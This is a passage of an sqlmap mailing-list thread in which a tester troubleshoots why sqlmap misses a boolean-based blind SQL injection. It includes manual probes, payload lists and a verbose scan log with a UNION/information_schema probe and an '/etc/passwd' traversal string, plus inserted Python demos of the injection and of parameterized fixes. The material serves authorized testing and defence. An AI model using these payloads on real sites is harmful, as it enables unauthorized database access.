>> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar <mir...@gm...> wrote:
>> >
>> > Can you please send the unredacted content of request.txt to my address?
>> >
>> > If not, then please at least send me the content of traffic file which you
>> > can obtain by just appending the "-t traffic.txt" to the regular sqlmap's
>> > run.
>> >
>> > Bye
>> >
>> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <amc...@gm...> wrote:
>> >>
>> >> Thanks for the quick reply.
>> >>
>> >> The contents of the request file are as follows:
>> >>
>> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
>> >> Host: <redacted>
>> >> Accept: */*
>> >> Accept-Language: en
>> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
>> >> Connection: close
>> >> Referer: <redacted>
>> >> Cookie: <redacted>
>> >>
>> >> I've redacted some of the details as it's not appropriate to draw
>> >> attention to an internet-facing application's SQLi vulnerability.
>> >>
>> >> When providing the request file as part of the following command:
>> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server' --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string 'industries' -v 1
>> >>
>> >> sqlmap executes as normal but cannot identify (and therefore cannot
>> >> exploit) the boolean-based blind vulnerability which I've verified
>> >> manually.
>> >>
>> >> Thanks again,
>> >>
>> >> Al.
>> >>
>> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar <mir...@gm...> wrote:
>> >> > And what is the content of request file?
>> >> >
>> >> > Bye
>> >> >
>> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson <amc...@gm...> wrote:
>> >> >>
>> >> >> Hi sqlmappers,
>> >> >>
>> >> >> I'm a fairly experienced user of sqlmap having used it extensively in
>> >> >> the past. I came across what appeared to be pretty typical boolean-based
>> >> >> blind SQLi in an application I'm (legally) testing. However, for the
>> >> >> first time, I'm unable to get sqlmap to recognise the parameter as
>> >> >> vulnerable to exploit it further. And as we know, manually exploiting
>> >> >> blind SQLi is cumbersome to say the least.
>> >> >>
>> >> >> Here is a summary of the requests I've made to manually confirm the
>> >> >> vulnerability.
>> >> >>
>> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
>> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns response A)
>> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns response B)
>> >> >>
>> >> >> I've tried various sqlmap flags and thought the following command
>> >> >> would give me the best chance of success:
>> >> >>
>> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server' --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string 'industries' -v 1
>> >> >>
>> >> >> Note: the string 'industries' is text that appears in response A but
>> >> >> not response B.
>> >> >>
>> >> >> I've looked at the requests that sqlmap is sending in the background
>> >> >> (proxied through burp). It appears that it's attempting to exploit
>> >> >> this with the AND statement as it should but is not using single
>> >> >> quotes as per my example above.
>> >> >>
>> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, I'd be
>> >> >> more than happy to contribute some time to improve it so it can
>> >> >> identify injectable parameters such as these in the future.
>> >> >>
>> >> >> Thanks,
>> >> >>
>> >> >> Al.
>> >> >
>> >> > --
>> >> > Miroslav Stampar
>> >> > http://about.me/stamparm
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>
> --
> Miroslav Stampar
> http://about.me/stamparm
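Alistair's point in the message above is that sqlmap's `PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ` and `PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd` payloads close the string literal exactly the way his manual `' AND '1'='1` / `' AND '1'='2` probes do, so they split the responses the same way. The following Python example is added here to make that concrete; it is not code from the thread or from sqlmap. It uses an in-memory SQLite table as a stand-in for the application's section lookup (the real schema behind /help/UserGuide.aspx is unknown, so the table and its contents are assumed), classifies each response by the same `industries` marker Alistair passed to `--string`, and then shows the parameterized query that makes every probe return the same "not found" page, which is the fix the application needs.

```python
import sqlite3

# Constructed stand-in for the application's help-section table; the real
# schema behind /help/UserGuide.aspx is not known (assumption).
SECTIONS = [
    ("PackageSelection", "Select packages for your industries"),
    ("Billing", "Billing and invoicing"),
]

# Values from the thread: Alistair's three manual probes and two of the
# payloads sqlmap logged in the --dummy run.
PROBES = {
    "baseline": "PackageSelection",
    "manual_true": "PackageSelection' AND '1'='1",
    "manual_false": "PackageSelection' AND '1'='2",
    "sqlmap_false": "PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ",
    "sqlmap_true": "PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd",
}

STRING_MARKER = "industries"  # the --string value from Alistair's command


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE help_section (name TEXT, body TEXT)")
    conn.executemany("INSERT INTO help_section VALUES (?, ?)", SECTIONS)
    return conn


def render_concatenated(conn, sec):
    """Vulnerable pattern: the Sec value is spliced into the SQL text, so a
    single quote in it closes the literal and the rest is parsed as SQL."""
    sql = "SELECT body FROM help_section WHERE name = '%s'" % sec
    row = conn.execute(sql).fetchone()
    return row[0] if row else "Section not found"


def render_parameterized(conn, sec):
    """Fixed pattern: the driver binds the value; quotes inside it are data,
    so the whole probe string is looked up as a section name and misses."""
    row = conn.execute(
        "SELECT body FROM help_section WHERE name = ?", (sec,)
    ).fetchone()
    return row[0] if row else "Section not found"


def classify(render, conn):
    """Label each probe's response 'A' if the --string marker is present
    (the lookup matched) and 'B' otherwise, the way a --string check does."""
    return {
        name: "A" if STRING_MARKER in render(conn, value) else "B"
        for name, value in PROBES.items()
    }


if __name__ == "__main__":
    db = make_db()
    print("concatenated :", classify(render_concatenated, db))
    print("parameterized:", classify(render_parameterized, db))
```

With the concatenated query, the baseline, the manual true probe and the sqlmap true payload all come back as response A while the two false probes come back as B, which is the discernible split Alistair verified by hand. With the bound parameter only the baseline matches; every probe is just an unknown section name, so there is nothing left for a boolean-based test to distinguish.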
From: Miroslav S. <mir...@gm...> - 2015-04-29 06:58:03
I would say that you screwed something up. Can you please send that traffic
file I requested?

Down below find a line that says: "[08:55:08] [PAYLOAD] PackageSelection'
AND 1595=1103 AND 'cBLQ'='cBLQ". That is the proof that your claims are
invalid.

$ python sqlmap.py -u www.site.com/help/UserGuide.aspx?Sec=PackageSelection --dummy -v 3
    _
 ___ ___| |_____ ___ ___  {1.0-dev-03f32ae}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability and
are not responsible for any misuse or damage caused by this program

[*] starting at 08:55:05

[08:55:05] [DEBUG] cleaning up configuration parameters
[08:55:05] [DEBUG] setting the HTTP timeout
[08:55:05] [DEBUG] creating HTTP requests opener object
[08:55:05] [DEBUG] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
[08:55:05] [PAYLOAD] WVJJ=8692 AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
[08:55:05] [DEBUG] setting match ratio for current parameter to 0.743
[08:55:05] [INFO] testing if the target URL is stable. This can take a couple of seconds
[08:55:06] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[08:55:08] [INFO] searching for dynamic content
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.446
[08:55:08] [CRITICAL] target URL is heavily dynamic. sqlmap is going to retry the request
[08:55:08] [INFO] searching for dynamic content
[08:55:08] [INFO] testing if GET parameter 'Sec' is dynamic
[08:55:08] [PAYLOAD] 2485
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.867
[08:55:08] [INFO] confirming that GET parameter 'Sec' is dynamic
[08:55:08] [PAYLOAD] 8682
[08:55:08] [INFO] GET parameter 'Sec' is dynamic
[08:55:08] [PAYLOAD] PackageSelection)"'.)"").'
[08:55:08] [WARNING] heuristic (basic) test shows that GET parameter 'Sec' might not be injectable
[08:55:08] [PAYLOAD] PackageSelection'LcAd<'">Hovs
[08:55:08] [INFO] testing for SQL injection on GET parameter 'Sec'
[08:55:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:55:08] [PAYLOAD] PackageSelection) AND 4774=3078 AND (8643=8643
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.833
[08:55:08] [PAYLOAD] PackageSelection) AND 1559=1559 AND (3186=3186
[08:55:08] [PAYLOAD] PackageSelection AND 8581=4897
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.851
[08:55:08] [PAYLOAD] PackageSelection AND 1559=1559
[08:55:08] [PAYLOAD] PackageSelection') AND 6273=6522 AND ('YHvu'='YHvu
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.554
[08:55:08] [PAYLOAD] PackageSelection') AND 1559=1559 AND ('sTiQ'='sTiQ
[08:55:08] [PAYLOAD] PackageSelection') AND 3601=4813 AND ('ParN'='ParN
[08:55:08] [PAYLOAD] PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.745
[08:55:08] [PAYLOAD] PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
[08:55:08] [PAYLOAD] PackageSelection' AND 8619=5317 AND 'RtrE'='RtrE
[08:55:08] [PAYLOAD] PackageSelection%' AND 3991=4465 AND '%'='
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.495
[08:55:08] [PAYLOAD] PackageSelection%' AND 1559=1559 AND '%'='
[08:55:08] [PAYLOAD] PackageSelection%' AND 5263=7541 AND '%'='
[08:55:08] [PAYLOAD] PackageSelection AND 8168=8736-- pZYt
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.685
[08:55:08] [PAYLOAD] PackageSelection AND 1559=1559-- NfAy
...

On Tue, Apr 28, 2015 at 3:15 PM, Alistair Johnson <amc...@gm...> wrote:
> Hi Brandon,
>
> Thanks for your comment. Confirming that I've tried risk=3 with
> level=5 with the same results. I've looked more closely at the
> requests that sqlmap is sending to check if the parameter is
> injectable. It is testing the Sec parameter with values such as:
>
> PackageSelection) AND 1477=7114
> PackageSelection) AND 1631=1631
> PackageSelection') AND 5603=7729
> PackageSelection') AND 1631=1631
> PackageSelection' AND 3943=9381
> PackageSelection' AND 1631=1631
> PackageSelection" AND 3324=4690
> PackageSelection" AND 1631=1631
> PackageSelection) AND 4734=6616 AND (6346=6346
> PackageSelection)) AND 7350=9272 AND (8861=8861
>
> When in fact, I assume it would need to use logic like I used to get
> distinguishable responses:
>
> PackageSelection (returns response A)
> PackageSelection' AND '1'='1 (returns response A)
> PackageSelection' AND '1'='2 (returns response B)
>
> In a nutshell, it doesn't appear to be trying single quotes and values
> in the ' AND '1'='1 pattern. But I would have thought this is a pretty
> typical format for checking boolean-based blind SQLi.
>
> Cheers,
>
> Alistair.
>
> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry <bpe...@gm...> wrote:
> > It's a GET, so there wouldn't be a content type, unless I am mistaken.
> >
> > Alistair, have you tried --risk=3 with --level=5 yet?
> >
> > Sent from a phone
> >
> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar <mir...@gm...> wrote:
> >
> > Can you please send the unredacted content of request.txt to my address?
> >
> > If not, then please at least send me the content of traffic file which you
> > can obtain by just appending the "-t traffic.txt" to the regular sqlmap's
> > run.
> >
> > Bye
> >
> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <amc...@gm...> wrote:
> >>
> >> Thanks for the quick reply.
> >>
> >> The contents of the request file are as follows:
> >>
> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
> >> Host: <redacted>
> >> Accept: */*
> >> Accept-Language: en
> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
> >> Connection: close
> >> Referer: <redacted>
> >> Cookie: <redacted>
> >>
> >> I've redacted some of the details as it's not appropriate to draw
> >> attention to an internet-facing application's SQLi vulnerability.
> >>
> >> When providing the request file as part of the following command:
> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server' --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string 'industries' -v 1
> >>
> >> sqlmap executes as normal but cannot identify (and therefore cannot
> >> exploit) the boolean-based blind vulnerability which I've verified
> >> manually.
> >>
> >> Thanks again,
> >>
> >> Al.
> >>
> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar <mir...@gm...> wrote:
> >> > And what is the content of request file?
> >> >
> >> > Bye
> >> >
> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson <amc...@gm...> wrote:
> >> >>
> >> >> Hi sqlmappers,
> >> >>
> >> >> I'm a fairly experienced user of sqlmap having used it extensively in
> >> >> the past. I came across what appeared to be pretty typical boolean-based
> >> >> blind SQLi in an application I'm (legally) testing. However, for the
> >> >> first time, I'm unable to get sqlmap to recognise the parameter as
> >> >> vulnerable to exploit it further. And as we know, manually exploiting
> >> >> blind SQLi is cumbersome to say the least.
> >> >>
> >> >> Here is a summary of the requests I've made to manually confirm the
> >> >> vulnerability.
> >> >>
> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns response A)
> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns response B)
> >> >>
> >> >> I've tried various sqlmap flags and thought the following command
> >> >> would give me the best chance of success:
> >> >>
> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server' --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string 'industries' -v 1
> >> >>
> >> >> Note: the string 'industries' is text that appears in response A but
> >> >> not response B.
> >> >>
> >> >> I've looked at the requests that sqlmap is sending in the background
> >> >> (proxied through burp). It appears that it's attempting to exploit
> >> >> this with the AND statement as it should but is not using single
> >> >> quotes as per my example above.
> >> >>
> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, I'd be
> >> >> more than happy to contribute some time to improve it so it can
> >> >> identify injectable parameters such as these in the future.
> >> >>
> >> >> Thanks,
> >> >>
> >> >> Al.
> >> >
> >> > --
> >> > Miroslav Stampar
> >> > http://about.me/stamparm
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
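The "target URL is not stable", "searching for dynamic content" and "setting match ratio" lines in Miroslav's dummy run above are sqlmap's page-comparison step: a stability check on two fetches of the unmodified URL, an attempt to locate content that changes between fetches, and a similarity ratio between each probe's response and the baseline. The Python example below is added here to show that logic in miniature; it is not sqlmap's code, the 0.98 threshold is an assumed value rather than sqlmap's setting, and the two sample pages (a found-section page carrying the `industries` marker and a not-found page, each with a per-request id that changes on every fetch) are constructed for the illustration. It also shows why `--string 'industries'`, the option Alistair used, is unaffected by the dynamic content that drags the raw ratio down.

```python
import difflib

# Constructed sample pages (not captured from the real site). The request id
# in the <div> changes on every fetch, which is what makes a page "not stable"
# in the sense of the sqlmap warning. Ids are one repeated digit so that two
# fetches share no characters inside the dynamic region.
PAGE_FOUND = ("<html><body><div id=req>{rid}</div>"
              "<h1>Package Selection</h1>"
              "<p>Select packages for your industries.</p>"
              "</body></html>")
PAGE_MISSING = ("<html><body><div id=req>{rid}</div>"
                "<h1>Help</h1><p>Section not found.</p>"
                "</body></html>")

MATCH_THRESHOLD = 0.98   # assumed value for illustration, not sqlmap's setting
STRING_MARKER = "industries"


def ratio(a, b):
    """Similarity in [0, 1] from difflib's SequenceMatcher (autojunk off so
    frequently repeated markup characters are not discarded as 'popular')."""
    return difflib.SequenceMatcher(None, a, b, autojunk=False).ratio()


def is_stable(first, second, threshold=MATCH_THRESHOLD):
    """Two fetches of the unmodified URL should look the same."""
    return ratio(first, second) >= threshold


def find_dynamic(first, second, context=8, min_static=4):
    """Locate regions that differ between two fetches of the same URL and
    return (prefix, suffix) anchors of static text around each, merging
    regions separated by only a few coincidentally equal characters."""
    sm = difflib.SequenceMatcher(None, first, second, autojunk=False)
    regions = []
    for tag, i1, i2, _j1, _j2 in sm.get_opcodes():
        if tag == "equal" and i2 - i1 >= min_static:
            continue
        if regions and regions[-1][1] == i1:
            regions[-1][1] = i2
        else:
            regions.append([i1, i2])
    return [(first[max(0, s - context):s], first[e:e + context])
            for s, e in regions]


def remove_dynamic(page, anchors):
    """Cut out whatever sits between each prefix/suffix anchor pair."""
    for prefix, suffix in anchors:
        start = page.find(prefix)
        if start < 0:
            continue
        start += len(prefix)
        end = page.find(suffix, start)
        if end < 0:
            continue
        page = page[:start] + page[end:]
    return page


def same_by_ratio(candidate, baseline, anchors=(), threshold=MATCH_THRESHOLD):
    """Ratio comparison, optionally after stripping known dynamic regions."""
    return ratio(remove_dynamic(candidate, anchors),
                 remove_dynamic(baseline, anchors)) >= threshold


def same_by_string(candidate, marker=STRING_MARKER):
    """The --string style check: presence of a marker that only the
    'true' page carries, independent of any other dynamic content."""
    return marker in candidate


def demo():
    """Return the comparison outcomes for a true and a false condition."""
    base1 = PAGE_FOUND.format(rid="1" * 12)        # first fetch of the plain URL
    base2 = PAGE_FOUND.format(rid="2" * 12)        # second fetch, new request id
    true_page = PAGE_FOUND.format(rid="3" * 12)    # condition held
    false_page = PAGE_MISSING.format(rid="4" * 12)  # condition failed
    anchors = find_dynamic(base1, base2)
    return {
        "stable": is_stable(base1, base2),
        "raw_ratio_true": same_by_ratio(true_page, base1),
        "raw_ratio_false": same_by_ratio(false_page, base1),
        "stripped_ratio_true": same_by_ratio(true_page, base1, anchors),
        "stripped_ratio_false": same_by_ratio(false_page, base1, anchors),
        "string_true": same_by_string(true_page),
        "string_false": same_by_string(false_page),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:22s} {value}")
```

On these pages the two baseline fetches score 0.904 against each other, so the stability check fails and a raw ratio comparison cannot tell the "true" page from the baseline either, since the changing request id costs the same similarity as a real difference would. Once the dynamic region has been located and removed, the ratio separates the two conditions cleanly; the string check separates them without any of that work, which is why a marker that appears only in one of the two responses is the more robust choice when a page is heavily dynamic.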
From: Brandon P. <bpe...@gm...> - 2015-04-28 14:19:17
Also, when testing, ensure a space follows the comment directly, otherwise
the comment syntax will be malformed. You are testing against an MSSQL db,
so I think the valid comment syntax will be --<space>

On Tue, Apr 28, 2015 at 9:07 AM, Brandon Perry <bpe...@gm...> wrote:
> Technically, it shouldn't*
>
> On Tue, Apr 28, 2015 at 9:07 AM, Brandon Perry <bpe...@gm...> wrote:
>
>> The injections I see like those are all suffixed with the start of a
>> comment (# or --). So, technically it should matter if single quotes are
>> used in the latter part of the boolean clause.
>>
>> For instance, SELECT * FROM blah WHERE foo = 'fdsa' with value 'fdsa'
>> being injectable. Using fdsa' AND 1=1# would result with the trailing
>> single quote being part of the comment and ignored by MySQL.
>>
>> Can you exploit the injection by hand using 1=1# or 1=1--?
>>
>> On Tue, Apr 28, 2015 at 8:15 AM, Alistair Johnson <amc...@gm...> wrote:
>>
>>> Hi Brandon,
>>>
>>> Thanks for your comment. Confirming that I've tried risk=3 with
>>> level=5 with the same results. I've looked more closely at the
>>> requests that sqlmap is sending to check if the parameter is
>>> injectable. It is testing the Sec parameter with values such as:
>>>
>>> PackageSelection) AND 1477=7114
>>> PackageSelection) AND 1631=1631
>>> PackageSelection') AND 5603=7729
>>> PackageSelection') AND 1631=1631
>>> PackageSelection' AND 3943=9381
>>> PackageSelection' AND 1631=1631
>>> PackageSelection" AND 3324=4690
>>> PackageSelection" AND 1631=1631
>>> PackageSelection) AND 4734=6616 AND (6346=6346
>>> PackageSelection)) AND 7350=9272 AND (8861=8861
>>>
>>> When in fact, I assume it would need to use logic like I used to get
>>> distinguishable responses:
>>>
>>> PackageSelection (returns response A)
>>> PackageSelection' AND '1'='1 (returns response A)
>>> PackageSelection' AND '1'='2 (returns response B)
>>>
>>> In a nutshell, it doesn't appear to be trying single quotes and values
>>> in the ' AND '1'='1 pattern. But I would have thought this is a pretty
>>> typical format for checking boolean-based blind SQLi.
>>>
>>> Cheers,
>>>
>>> Alistair.
>>>
>>> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry <bpe...@gm...> wrote:
>>> > It's a GET, so there wouldn't be a content type, unless I am mistaken.
>>> >
>>> > Alistair, have you tried --risk=3 with --level=5 yet?
>>> >
>>> > Sent from a phone
>>> >
>>> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar <mir...@gm...> wrote:
>>> >
>>> > Can you please send the unredacted content of request.txt to my address?
>>> >
>>> > If not, then please at least send me the content of traffic file which you
>>> > can obtain by just appending the "-t traffic.txt" to the regular sqlmap's
>>> > run.
>>> >
>>> > Bye
>>> >
>>> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <amc...@gm...> wrote:
>>> >>
>>> >> Thanks for the quick reply.
>>> >>
>>> >> The contents of the request file are as follows:
>>> >>
>>> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
>>> >> Host: <redacted>
>>> >> Accept: */*
>>> >> Accept-Language: en
>>> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
>>> >> Connection: close
>>> >> Referer: <redacted>
>>> >> Cookie: <redacted>
>>> >>
>>> >> I've redacted some of the details as it's not appropriate to draw
>>> >> attention to an internet-facing application's SQLi vulnerability.
>>> >>
>>> >> When providing the request file as part of the following command:
>>> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server' --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string 'industries' -v 1
>>> >>
>>> >> sqlmap executes as normal but cannot identify (and therefore cannot
>>> >> exploit) the boolean-based blind vulnerability which I've verified
>>> >> manually.
>>> >>
>>> >> Thanks again,
>>> >>
>>> >> Al.
>>> >>
>>> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar <mir...@gm...> wrote:
>>> >> > And what is the content of request file?
>>> >> >
>>> >> > Bye
>>> >> >
>>> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson <amc...@gm...> wrote:
>>> >> >>
>>> >> >> Hi sqlmappers,
>>> >> >>
>>> >> >> I'm a fairly experienced user of sqlmap having used it extensively in
>>> >> >> the past. I came across what appeared to be pretty typical boolean-based
>>> >> >> blind SQLi in an application I'm (legally) testing. However, for the
>>> >> >> first time, I'm unable to get sqlmap to recognise the parameter as
>>> >> >> vulnerable to exploit it further. And as we know, manually exploiting
>>> >> >> blind SQLi is cumbersome to say the least.
>>> >> >>
>>> >> >> Here is a summary of the requests I've made to manually confirm the
>>> >> >> vulnerability.
>>> >> >>
>>> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
>>> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns response A)
>>> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns response B)
>>> >> >>
>>> >> >> I've tried various sqlmap flags and thought the following command
>>> >> >> would give me the best chance of success:
>>> >> >>
>>> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server' --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string 'industries' -v 1
>>> >> >>
>>> >> >> Note: the string 'industries' is text that appears in response A but
>>> >> >> not response B.
>>> >> >>
>>> >> >> I've looked at the requests that sqlmap is sending in the background
>>> >> >> (proxied through burp). It appears that it's attempting to exploit
>>> >> >> this with the AND statement as it should but is not using single
>>> >> >> quotes as per my example above.
>>> >> >>
>>> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, I'd be
>>> >> >> more than happy to contribute some time to improve it so it can
>>> >> >> identify injectable parameters such as these in the future.
>>> >> >>
>>> >> >> Thanks,
>>> >> >>
>>> >> >> Al.
>>> >> >
>>> >> > --
>>> >> > Miroslav Stampar
>>> >> > http://about.me/stamparm
>>> >
>>> > --
>>> > Miroslav Stampar
>>> > http://about.me/stamparm
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: Brandon P. <bpe...@gm...> - 2015-04-28 14:07:54
|
Technically, it shouldn't*

On Tue, Apr 28, 2015 at 9:07 AM, Brandon Perry <bpe...@gm...> wrote:
> The injections I see like those are all suffixed with the start of a
> comment (# or --). So, technically it should matter if single quotes are
> used in the latter part of the boolean clause.
>
> For instance, SELECT * FROM blah WHERE foo = 'fdsa' with value 'fdsa'
> being injectable. Using fdsa' AND 1=1# would result with the trailing
> single quote being part of the comment and ignored by MySQL.
>
> Can you exploit the injection by hand using 1=1# or 1=1--?

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
|
From: Brandon P. <bpe...@gm...> - 2015-04-28 14:07:39
|
The injections I see like those are all suffixed with the start of a
comment (# or --). So, technically it should matter if single quotes are
used in the latter part of the boolean clause.

For instance, SELECT * FROM blah WHERE foo = 'fdsa' with value 'fdsa'
being injectable. Using fdsa' AND 1=1# would result with the trailing
single quote being part of the comment and ignored by MySQL.

Can you exploit the injection by hand using 1=1# or 1=1--?

On Tue, Apr 28, 2015 at 8:15 AM, Alistair Johnson <amc...@gm...> wrote:
> Hi Brandon,
>
> Thanks for your comment. Confirming that I've tried risk=3 with
> level=5 with the same results. I've looked more closely at the
> requests that sqlmap is sending to check if the parameter is
> injectable. It is testing the Sec parameter with values such as:
>
> PackageSelection) AND 1477=7114
> PackageSelection) AND 1631=1631
> PackageSelection') AND 5603=7729
> PackageSelection') AND 1631=1631
> PackageSelection' AND 3943=9381
> PackageSelection' AND 1631=1631
> PackageSelection" AND 3324=4690
> PackageSelection" AND 1631=1631
> PackageSelection) AND 4734=6616 AND (6346=6346
> PackageSelection)) AND 7350=9272 AND (8861=8861
>
> When in fact, I assume it would need to use logic like I used to get
> distinguishable responses:
>
> PackageSelection (returns response A)
> PackageSelection' AND '1'='1 (returns response A)
> PackageSelection' AND '1'='2 (returns response B)
>
> In a nutshell, it doesn't appear to be trying single quotes and values
> in the ' AND '1'='1 pattern. But I would have thought this is a pretty
> typical format for checking boolean-based blind SQLi.
>
> Cheers,
>
> Alistair.

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
|
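To make Brandon's point about the comment suffix concrete, here is an added example (not code from the thread, nor from sqlmap) that builds the `blah` query from his message both ways: by string concatenation, which is what makes `foo` injectable, and with a bound parameter. It runs against a constructed in-memory SQLite table, so `--` serves as the comment marker rather than MySQL's `#`; the table contents, the `industries` marker string (standing in for the `--string 'industries'` check) and the function names are assumptions made for the demonstration.

```python
import sqlite3

MARKER = "industries"  # assumed distinguishing string, like --string 'industries' in the thread


def make_db():
    """Constructed in-memory stand-in for the 'blah' table in Brandon's example query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE blah (id INTEGER PRIMARY KEY, foo TEXT, body TEXT)")
    conn.execute("INSERT INTO blah (foo, body) VALUES ('fdsa', 'industries overview page')")
    conn.execute("INSERT INTO blah (foo, body) VALUES ('other', 'unrelated page')")
    conn.commit()
    return conn


def lookup_vulnerable(conn, value):
    """Builds the WHERE clause by concatenation: the value becomes part of the SQL text."""
    sql = "SELECT body FROM blah WHERE foo = '" + value + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, value):
    """Same lookup with a bound parameter: the value is data, never SQL."""
    sql = "SELECT body FROM blah WHERE foo = ?"
    return [row[0] for row in conn.execute(sql, (value,))]


def probe(lookup, conn, value):
    """Classify the response the way a --string check does: 'A' if the marker is
    present, 'B' if it is absent, 'ERR' if the query did not even parse."""
    try:
        rows = lookup(conn, value)
    except sqlite3.Error:
        return "ERR"
    return "A" if any(MARKER in body for body in rows) else "B"


def compare_probes():
    """Run the probe shapes discussed in the thread against both lookups and
    return {value: (verdict for concatenation, verdict for bound parameter)}."""
    conn = make_db()
    values = [
        "fdsa",                  # untouched value
        "fdsa' AND 1=1-- ",      # comment-suffixed true condition
        "fdsa' AND 1=2-- ",      # comment-suffixed false condition
        "fdsa' AND '1'='1",      # quote-balanced true condition (the manual test's shape)
        "fdsa' AND '1'='2",      # quote-balanced false condition
        "fdsa' AND 1=1",         # no suffix at all: leaves the app's closing quote dangling
    ]
    return {
        v: (probe(lookup_vulnerable, conn, v), probe(lookup_safe, conn, v))
        for v in values
    }


if __name__ == "__main__":
    for value, (vuln, safe) in compare_probes().items():
        print("%-22r concatenated=%s parameterised=%s" % (value, vuln, safe))
```

With concatenation, the comment-suffixed form and the quote-balanced form give the same A/B split, which is why the trailing quote in the application's query does not matter once a comment follows the condition; a condition with no suffix at all leaves the query unparseable. With the bound parameter every probe returns B, because the whole value is compared as a literal and nothing in it reaches the SQL parser.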
From: Alistair J. <amc...@gm...> - 2015-04-28 13:16:01
|
Hi Brandon,

Thanks for your comment. Confirming that I've tried risk=3 with
level=5 with the same results. I've looked more closely at the
requests that sqlmap is sending to check if the parameter is
injectable. It is testing the Sec parameter with values such as:

PackageSelection) AND 1477=7114
PackageSelection) AND 1631=1631
PackageSelection') AND 5603=7729
PackageSelection') AND 1631=1631
PackageSelection' AND 3943=9381
PackageSelection' AND 1631=1631
PackageSelection" AND 3324=4690
PackageSelection" AND 1631=1631
PackageSelection) AND 4734=6616 AND (6346=6346
PackageSelection)) AND 7350=9272 AND (8861=8861

When in fact, I assume it would need to use logic like I used to get
distinguishable responses:

